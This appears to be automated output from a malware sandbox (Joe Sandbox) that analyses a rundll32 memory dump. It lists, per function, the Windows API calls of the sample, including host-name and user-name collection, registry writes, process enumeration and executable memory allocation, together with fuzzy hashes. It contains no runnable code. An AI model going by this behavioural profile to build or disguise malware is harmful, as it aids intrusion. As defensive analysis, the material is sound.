                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                • String ID: P
                                • API String ID: 3649579052-3110715001
                                • Opcode ID: ebe8b1f2affc99664dc9ec0ee2565436fb946eb10ffa86a9f689ea252e310412
                                • Instruction ID: e3be2db33ae7b92d4d63507122ac5b85883998dc5700d87498351393edf11b51
                                • Opcode Fuzzy Hash: ebe8b1f2affc99664dc9ec0ee2565436fb946eb10ffa86a9f689ea252e310412
                                • Instruction Fuzzy Hash: 5161697590020AAFCF11FFA9DC89DAFBBF9EF49204B18442BE505AF210D7349D068B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0349148E: InterlockedIncrement.KERNEL32(00000018), ref: 034914DF
                                  • Part of subcall function 0349148E: RtlLeaveCriticalSection.NTDLL(0616C378), ref: 0349156A
                                • OpenProcess.KERNEL32(00000410,B8F475FF,03482289,00000000,00000000,03482289,0000001C,00000000,00000000,?,?,?,03482289), ref: 0348C5BD
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,03482299,00000104,?,?,?,03482289), ref: 0348C5DB
                                • GetSystemTimeAsFileTime.KERNEL32(03482289), ref: 0348C643
                                • lstrlenW.KERNEL32(C78BC933), ref: 0348C6B8
                                • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0348C6D4
                                • memcpy.NTDLL(00000014,C78BC933,00000002), ref: 0348C6EC
                                  • Part of subcall function 0347F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0347F384
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                                • String ID: o
                                • API String ID: 2541713525-252678980
                                • Opcode ID: 63962e7d2ab4001422201dc7df8dc2ceabd918f8795406ee86015ba680aec18e
                                • Instruction ID: 8ed2d06c0bdcca859e7902c76b0a600de55aa7c0c747102ee6aed8fb5156814f
                                • Opcode Fuzzy Hash: 63962e7d2ab4001422201dc7df8dc2ceabd918f8795406ee86015ba680aec18e
                                • Instruction Fuzzy Hash: D8519FB1610706AFDB11EF64D888BAAF7E8FF08304F14452BE905EF254D770E9548BA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0347A391
                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0347A3BD
                                • _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0347A3CD
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0347A405
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0347A427
                                • GetShellWindow.USER32 ref: 0347A436
                                  • Part of subcall function 03482986: GetShellWindow.USER32 ref: 034829A4
                                  • Part of subcall function 03482986: GetVersion.KERNEL32 ref: 03482A46
                                  • Part of subcall function 03482986: GetVersion.KERNEL32 ref: 03482A54
                                • GetLastError.KERNEL32(?), ref: 0347A521
                                • CloseHandle.KERNEL32(?), ref: 0347A535
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: TimerWaitable$ShellVersionWindow$CloseCreateErrorHandleLastMultipleObjectsWait_allmul
                                • String ID:
                                • API String ID: 2436285880-0
                                • Opcode ID: 403cf2c6d94976799d321dc79720e06b82956ea4c4d5626eac5f9c766087ccee
                                • Instruction ID: e27a191316d0ed978b12671e21cbc414d6179112026b08236e51aac63cb803e4
                                • Opcode Fuzzy Hash: 403cf2c6d94976799d321dc79720e06b82956ea4c4d5626eac5f9c766087ccee
                                • Instruction Fuzzy Hash: DC717AB1508305AFC750EF64C8888AFBBECFB88354F040A6EF595DB290D730D9458B66
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348B7A4: RegCreateKeyA.ADVAPI32(80000001,0616B7F0,?), ref: 0348B7B9
                                  • Part of subcall function 0348B7A4: lstrlen.KERNEL32(0616B7F0,00000000,00000000,00000000,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C,00000008,00000003), ref: 0348B7E2
                                • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 03477AA6
                                • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 03477ABE
                                • HeapFree.KERNEL32(00000000,?,?,034887CC,?,?), ref: 03477B20
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03477B34
                                • WaitForSingleObject.KERNEL32(00000000,?,034887CC,?,?), ref: 03477B86
                                • HeapFree.KERNEL32(00000000,?,?,034887CC,?,?), ref: 03477BAF
                                • HeapFree.KERNEL32(00000000,?,?,034887CC,?,?), ref: 03477BBF
                                • RegCloseKey.ADVAPI32(?,?,034887CC,?,?), ref: 03477BC8
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                • String ID:
                                • API String ID: 3503961013-0
                                • Opcode ID: 70e5e06d5b3e33fdaafabc019486fe649a9316d58922fd7d979c9463d9f1cb52
                                • Instruction ID: 8bee233915350d4b971651af33fa0ed11006c46699daf46b2030b1e25bec4fc2
                                • Opcode Fuzzy Hash: 70e5e06d5b3e33fdaafabc019486fe649a9316d58922fd7d979c9463d9f1cb52
                                • Instruction Fuzzy Hash: 8E41C3B5D00209EFDF11EFA5C8888EEBFB9FF18208F15446BE511BA210D2354A98DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0347A1A1), ref: 0347AAC5
                                • wsprintfA.USER32 ref: 0347AAED
                                • lstrlen.KERNEL32(?), ref: 0347AAFC
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                • wsprintfA.USER32 ref: 0347AB3C
                                • wsprintfA.USER32 ref: 0347AB71
                                • memcpy.NTDLL(00000000,?,?), ref: 0347AB7E
                                • memcpy.NTDLL(00000008,034953E8,00000002,00000000,?,?), ref: 0347AB93
                                • wsprintfA.USER32 ref: 0347ABB6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                • String ID:
                                • API String ID: 2937943280-0
                                • Opcode ID: b552b7cb29e13c4697a2d5dd159723e2cefea5298ac172f5dbf8a0cd4b30f9d1
                                • Instruction ID: 3400ef811625c67db67d8c62b994ce5217e852cb286e77d6be45ea69d42ea756
                                • Opcode Fuzzy Hash: b552b7cb29e13c4697a2d5dd159723e2cefea5298ac172f5dbf8a0cd4b30f9d1
                                • Instruction Fuzzy Hash: 1B415371900209EFDB10DF99D885E9EB7FCEF48308B14455AE519EB311E730EA05CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 034916F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03491703
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 03491715
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,03486C8E), ref: 03491739
                                • GetComputerNameW.KERNEL32(00000000,?), ref: 03491747
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0349175E
                                • GetComputerNameW.KERNEL32(00000000,?), ref: 0349176F
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03486C8E), ref: 03491795
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: 5d7038c8618e98f14ae0df4cf7d7427106dd1dee6f77a942d6ae4513910062e4
                                • Instruction ID: 0d17d970064b8b9796d03e43af901c5756a795489996b05efd37ae9614d35345
                                • Opcode Fuzzy Hash: 5d7038c8618e98f14ae0df4cf7d7427106dd1dee6f77a942d6ae4513910062e4
                                • Instruction Fuzzy Hash: 9D3101B690020AEFEF00EFB5DD85C6EBBF9FB5424071584AAE505EB204E730DE459B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?,?), ref: 034863F5
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03486407
                                • wcstombs.NTDLL ref: 03486415
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?), ref: 03486439
                                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0348644E
                                • mbstowcs.NTDLL ref: 0348645B
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?,?,?), ref: 0348646D
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?,?,?), ref: 03486487
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                • String ID:
                                • API String ID: 316328430-0
                                • Opcode ID: b892bb072176cff6ddc942b09a3b12aab8c0f23f93039b2d68fe6766fcfe0908
                                • Instruction ID: 27e89e6dbb0f0babf9dcd7dec430c93d6dc388e20e6163ee9f6febe28200bcab
                                • Opcode Fuzzy Hash: b892bb072176cff6ddc942b09a3b12aab8c0f23f93039b2d68fe6766fcfe0908
                                • Instruction Fuzzy Hash: C821AC3150020AFFCF12AFA1EC09E8F7BB9EB05300F258063BA04AA160D7719964EF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(0348E453,00000000,00000000,0349A440,?,?,0347F68B,0348E453,00000000,0348E453,0349A420), ref: 0347D935
                                • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0347D943
                                • wsprintfA.USER32 ref: 0347D95F
                                • RegCreateKeyA.ADVAPI32(80000001,0349A420,00000000), ref: 0347D977
                                • lstrlen.KERNEL32(?), ref: 0347D986
                                • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0347D994
                                • RegCloseKey.ADVAPI32(?), ref: 0347D99F
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347D9AE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                • String ID:
                                • API String ID: 1575615994-0
                                • Opcode ID: 7a8af4c14699da4fae230afc1db517235576a4ccb3f1f253e18fb76664d9f58c
                                • Instruction ID: 78104f3fc15551659230967f5d5ad0ed84f3b5eeb739e34bd147988e1a8952e2
                                • Opcode Fuzzy Hash: 7a8af4c14699da4fae230afc1db517235576a4ccb3f1f253e18fb76664d9f58c
                                • Instruction Fuzzy Hash: E1116172100108BFEB116F94EC49EAA3BBDFB59714F114026FA04EA154E7729D14DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0348FE12
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0348FE30
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0348FE38
                                • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0348FE56
                                • GetLastError.KERNEL32 ref: 0348FE6A
                                • RegCloseKey.ADVAPI32(?), ref: 0348FE75
                                • CloseHandle.KERNEL32(00000000), ref: 0348FE7C
                                • GetLastError.KERNEL32 ref: 0348FE84
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                • String ID:
                                • API String ID: 3822162776-0
                                • Opcode ID: 6bcb99422b517228844a9e228617cdcdbdf94a778fa5061c73de4d704020d1bf
                                • Instruction ID: edc30682920d00bae8075f175b20dd983cf62dd78b14f5b2590abb2ecd7578e4
                                • Opcode Fuzzy Hash: 6bcb99422b517228844a9e228617cdcdbdf94a778fa5061c73de4d704020d1bf
                                • Instruction Fuzzy Hash: 35116176100208FFDB02BFA5E849ABA3BA9FF55351F244016FE05DE245DB31C919CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 3eaa3df1c4b4d24fc802b3e3daa69273750afc7405a6762e40c86ac51743304d
                                • Instruction ID: 9b40121c4a9b440925af38aeb4b37486f7e1c45e936c6f568666e787c5bac404
                                • Opcode Fuzzy Hash: 3eaa3df1c4b4d24fc802b3e3daa69273750afc7405a6762e40c86ac51743304d
                                • Instruction Fuzzy Hash: DCB11775C00229EFDF21EF95CC48AEEBBB8EF05314F194066E811BB260D7355A45CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memcpy.NTDLL(?,?,0000000D,?,?,00000000,?,?,?,?,?,?,?,?,03492801,?), ref: 0349242E
                                • memcpy.NTDLL(?,?,0000000D,?,?,0000000D,?,?,00000000), ref: 0349243B
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memcpy.NTDLL(00000000,?,?,00000008,?,00000001,03492801,00000000,00000001,?,?,?,?,03492801,?,00000000), ref: 034925C9
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy$AllocateHeap
                                • String ID:
                                • API String ID: 4068229299-0
                                • Opcode ID: 5394d95425725e6a6006762145373b5f0434d0ea016bf7926fffa52d99b23905
                                • Instruction ID: cab94a3f25afc26f637e597c663ff3247ab0d8b6e809bd5145c62e20f1163b95
                                • Opcode Fuzzy Hash: 5394d95425725e6a6006762145373b5f0434d0ea016bf7926fffa52d99b23905
                                • Instruction Fuzzy Hash: 12B12975A0020EBBEF11EF95CD80EEF7BB9AF04204F044557E914AF250E7B0DA158BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCommandLineA.KERNEL32(034960F0,00000038,0347E22A,00000000,76CDF5B0,03480348,?,00000001,?,?,?,?,?,?,?,03479100), ref: 0347BA7C
                                • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 0347BA8D
                                  • Part of subcall function 0347D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0347DA7B,?), ref: 0347D4E3
                                  • Part of subcall function 0347D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0347D506
                                  • Part of subcall function 0347D4DA: memset.NTDLL ref: 0347D515
                                • ExitProcess.KERNEL32 ref: 0347BC6F
                                  • Part of subcall function 0347A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,0616C304,00000000,?,03476584,?), ref: 0347A90E
                                  • Part of subcall function 0347A8E9: StrTrimA.SHLWAPI(00000020,03495FCC,00000000,?,03476584,?), ref: 0347A92D
                                  • Part of subcall function 0347A8E9: StrChrA.SHLWAPI(00000020,?,?,03476584,?), ref: 0347A939
                                • lstrcmp.KERNEL32(?,?), ref: 0347BAFB
                                • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,03479100,?), ref: 0347BB13
                                  • Part of subcall function 03474BC4: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0616B7F0,?,?,0348B7F2,0000003A,0616B7F0,?,0348A2EB,00000001,?,00000000,00000000), ref: 03474C04
                                  • Part of subcall function 03474BC4: CloseHandle.KERNEL32(000000FF,?,?,0348B7F2,0000003A,0616B7F0,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C), ref: 03474C0F
                                • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,03479100,?), ref: 0347BB85
                                • lstrcmp.KERNEL32(?,?), ref: 0347BB9E
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                                • String ID:
                                • API String ID: 739714153-0
                                • Opcode ID: 31c9823c881aa5b5c109282734eac6ac20ff2874e90e66862e33732edf3f0583
                                • Instruction ID: d40eaf0e4cfb55116822f0c44bed7ee678fa2778ab271e3fb0a17d23a191832b
                                • Opcode Fuzzy Hash: 31c9823c881aa5b5c109282734eac6ac20ff2874e90e66862e33732edf3f0583
                                • Instruction Fuzzy Hash: A6512A71900219EFDF21EBA5CC89AEEBBB9EF09700F18445BE501BE254DB359941CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 034894B7
                                • StrTrimA.SHLWAPI(00000000,?), ref: 034894D4
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03489507
                                • RtlImageNtHeader.NTDLL(00000000), ref: 03489532
                                • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 034895F7
                                  • Part of subcall function 0347D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0347DA7B,?), ref: 0347D4E3
                                  • Part of subcall function 0347D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0347D506
                                  • Part of subcall function 0347D4DA: memset.NTDLL ref: 0347D515
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 034895A8
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 034895D7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                • String ID:
                                • API String ID: 239510280-0
                                • Opcode ID: 3b681278b4f77e9f690ec909ff95aa492f75066eb39f86f493a23aea07a8b79f
                                • Instruction ID: c3726b755c0560f2d2aa5ccb3a86743e4ffdb093b8fa0d1d38d36ea0578822b0
                                • Opcode Fuzzy Hash: 3b681278b4f77e9f690ec909ff95aa492f75066eb39f86f493a23aea07a8b79f
                                • Instruction Fuzzy Hash: BB41CF32A01605BFDB22FF95CC45FAE7AA9EF45740F140067FA04AE280DBB19A41D758
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D6F2
                                • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D710
                                • RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0348D73C
                                • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D753
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348D766
                                • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D775
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,03471785,?,?,?), ref: 0348D7D9
                                  • Part of subcall function 0347F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0347F384
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                • String ID:
                                • API String ID: 1635816815-0
                                • Opcode ID: 831b460b9e2613ddfc0e0278bebbde6ce28a946e6a48333832d1c5e2a9025c5f
                                • Instruction ID: dc5babc857a57aca6ea8dfdb6ae08baf94a72fb8cfd73ee1af633762d986f121
                                • Opcode Fuzzy Hash: 831b460b9e2613ddfc0e0278bebbde6ce28a946e6a48333832d1c5e2a9025c5f
                                • Instruction Fuzzy Hash: 0C41A135901218AFDB22FFA5CC84B9FBBA9EF06350F15406BE805AF2A0D770D944DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 03491AED
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 03491B1B
                                • GetWindowThreadProcessId.USER32(?,?), ref: 03491B60
                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 03491B88
                                • _strupr.NTDLL ref: 03491BB3
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 03491BC0
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 03491BDA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                                • String ID:
                                • API String ID: 3831658075-0
                                • Opcode ID: 15353aec71319531553b4f4851a9f3876fcd56f37c1a57656a40189da5505d92
                                • Instruction ID: 09607ba5618a8897c37be1e72160b50c889045fed442ba02eafcb0e516daf308
                                • Opcode Fuzzy Hash: 15353aec71319531553b4f4851a9f3876fcd56f37c1a57656a40189da5505d92
                                • Instruction Fuzzy Hash: 87414C71D00219EFEF21DFA5CC49BEEBFB9AB48701F14419BE601AA250D7749640CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlImageNtHeader.NTDLL ref: 034845B6
                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 034845F9
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03484614
                                • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 0348466A
                                • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 034846C6
                                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 034846D4
                                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 034846DF
                                  • Part of subcall function 034726D3: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 034726E7
                                  • Part of subcall function 034726D3: memcpy.NTDLL(00000000,?,?,?), ref: 03472710
                                  • Part of subcall function 034726D3: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 03472739
                                  • Part of subcall function 034726D3: RegCloseKey.ADVAPI32(?), ref: 03472764
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                • String ID:
                                • API String ID: 3181710096-0
                                • Opcode ID: f8c11e1d8359ff1d55234b6d8cedfa685ae7e79f4b1e7f7b20d9b353e3949fea
                                • Instruction ID: 04bfd1238424bed5400603c2abc051b2dfcfb12d969ad0b4dc4a78a2440c234a
                                • Opcode Fuzzy Hash: f8c11e1d8359ff1d55234b6d8cedfa685ae7e79f4b1e7f7b20d9b353e3949fea
                                • Instruction Fuzzy Hash: 6841A031600206AFDB21EF66D889B6F7BE8EF50340F18402BE901FE364DB34D905CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 03484943
                                • StrTrimA.SHLWAPI(?,?), ref: 03484961
                                • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 034849CA
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 034849EB
                                • DeleteFileA.KERNEL32(?,00003219), ref: 03484A0D
                                • HeapFree.KERNEL32(00000000,?), ref: 03484A1C
                                • HeapFree.KERNEL32(00000000,?,00003219), ref: 03484A34
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                • String ID:
                                • API String ID: 1078934163-0
                                • Opcode ID: d8bd981f9cc908c27c008a7795edb827a0911c2a8f8c1b4323f5809578403255
                                • Instruction ID: 446fbe201943cb34386f89060e2adf20b0fef91d9fba7285283570eb139615ec
                                • Opcode Fuzzy Hash: d8bd981f9cc908c27c008a7795edb827a0911c2a8f8c1b4323f5809578403255
                                • Instruction Fuzzy Hash: 6831DD32104206AFD711FF69DC06F6BB7E8EB56744F09005BFA44EF240D724E8068BAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,03478478,00000000), ref: 0347E02B
                                • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0347E040
                                • memset.NTDLL ref: 0347E04D
                                • HeapFree.KERNEL32(00000000,00000000,?,03478477,?,?,00000000,?,00000000,03489CD0,?,00000000), ref: 0347E06A
                                • memcpy.NTDLL(?,?,03478477,?,03478477,?,?,00000000,?,00000000,03489CD0,?,00000000), ref: 0347E08B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Allocate$Freememcpymemset
                                • String ID: chun
                                • API String ID: 2362494589-3058818181
                                • Opcode ID: d63ebfe1d8bd25e9a1cc3f901ccec614f23ce1514bdf618fda9a4665d8ef616f
                                • Instruction ID: 6b60a9a8c82f5f9de4bf5e2edf2b3d26450adbcff5903de436e3c329512075ad
